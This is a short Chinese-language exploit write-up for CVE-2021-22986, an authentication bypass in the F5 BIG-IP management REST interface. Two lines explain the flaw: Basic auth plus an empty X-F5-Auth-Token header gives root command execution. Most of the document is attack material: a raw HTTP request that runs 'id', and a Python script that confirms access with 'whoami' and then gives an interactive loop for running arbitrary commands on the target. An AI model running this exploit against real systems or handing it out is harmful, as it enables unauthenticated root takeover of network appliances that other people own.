原理
在同时设置HTTP基础认证与X-F5-Auth-Token头且值为空时,会绕过程序对身份的验证,通过特定的接口即可进行远程命令执行。
影响范围
危害
可以获取root权限,并以root权限执行命令。
POC & EXP
手工
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.59.7
Content-Type: application/json
X-F5-Auth-Token:
Authorization: Basic YWRtaW46
Content-Length: 52
{
"command": "run",
"utilCmdArgs": "-c id"
}
脚本
import requests
import json
import sys
requests.packages.urllib3.disable_warnings()
proxies = {'http': 'http://localhost:7890', 'https': 'http://localhost:7890'}
# BIG IP CVE-2021-22986
def POC(ip, cmd):
url = "https://" + ip + "/mgmt/tm/util/bash"
headers = {
"Authorization": "Basic YWRtaW46QVNhc1M=",
"X-F5-Auth-Token": "",
"Content-Type": "application/json"
}
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
try:
text = requests.post(url=url, json=data, headers=headers, verify=False, timeout=20, proxies=proxies)
if text.status_code == 200 and 'commandResult' in text.text:
source = json.loads(text.text)
print(source['commandResult'])
return True
else:
print("Code: " + str(text.status_code))
return False
except Exception as e:
print("Error")
return False
if __name__ == "__main__":
ip = sys.argv[1]
if POC(ip, "whoami"):
while 1:
POC(ip, input("Command: "))
else:
print("commandResult not Found.")